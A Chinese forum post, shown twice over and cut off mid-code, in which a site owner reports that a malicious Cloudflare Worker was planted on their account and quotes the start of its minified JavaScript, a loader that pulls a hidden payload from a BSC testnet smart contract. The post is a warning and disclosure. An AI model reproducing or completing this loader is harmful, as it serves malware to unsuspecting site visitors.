【更新完结局】来围观,网站被植入恶意脚本,快去看看你的cf账号
- 内容介绍
- 文章标签
- 相关推荐
前提概要:代码有毒,请勿执行
下面两个图片熟悉吗?
image531×477 60.3 KB
网站是: https://newapi.371723.xyz/ 目前恶意代码还没删,
先说结论:
本来是以为1panel的漏洞,排查到最后发现是cf被人写了恶意的work
密码理论上不可能被爆破,账号是微软邮箱,也接了二验,还未想明白哪里问题?
饭后更新,有兴趣的佬可以1.30后看看
两段代码
第一段
image860×353 30.1 KB
export default{async fetch(t,e,a){let s="";try{const t=async t=>{const e=t=>{let e="0x";for(const a of t){const t=a.toString(16);e+=1===t.length?`0${t}`:t}return e},a=await fetch("https://bsc-testnet.drpc.org/",{method:"POST",headers:{Accept:"application/json","Content-Type":"application/json"},body:JSON.stringify({method:"eth_call",params:[{to:t,data:"0x6d4ce63c"},"latest"],id:97,jsonrpc:"2.0"})}),s=(await a.json()).result.slice(2),n=new Uint8Array(s.match(/[\da-f]{2}/gi).map((t=>parseInt(t,16)))),c=Number(e(n.slice(0,32))),r=Number(e(n.slice(32,32+c)));return String.f
前提概要:代码有毒,请勿执行
下面两个图片熟悉吗?
image531×477 60.3 KB
网站是: https://newapi.371723.xyz/ 目前恶意代码还没删,
先说结论:
本来是以为1panel的漏洞,排查到最后发现是cf被人写了恶意的work
密码理论上不可能被爆破,账号是微软邮箱,也接了二验,还未想明白哪里问题?
饭后更新,有兴趣的佬可以1.30后看看
两段代码
第一段
image860×353 30.1 KB
export default{async fetch(t,e,a){let s="";try{const t=async t=>{const e=t=>{let e="0x";for(const a of t){const t=a.toString(16);e+=1===t.length?`0${t}`:t}return e},a=await fetch("https://bsc-testnet.drpc.org/",{method:"POST",headers:{Accept:"application/json","Content-Type":"application/json"},body:JSON.stringify({method:"eth_call",params:[{to:t,data:"0x6d4ce63c"},"latest"],id:97,jsonrpc:"2.0"})}),s=(await a.json()).result.slice(2),n=new Uint8Array(s.match(/[\da-f]{2}/gi).map((t=>parseInt(t,16)))),c=Number(e(n.slice(0,32))),r=Number(e(n.slice(32,32+c)));return String.f

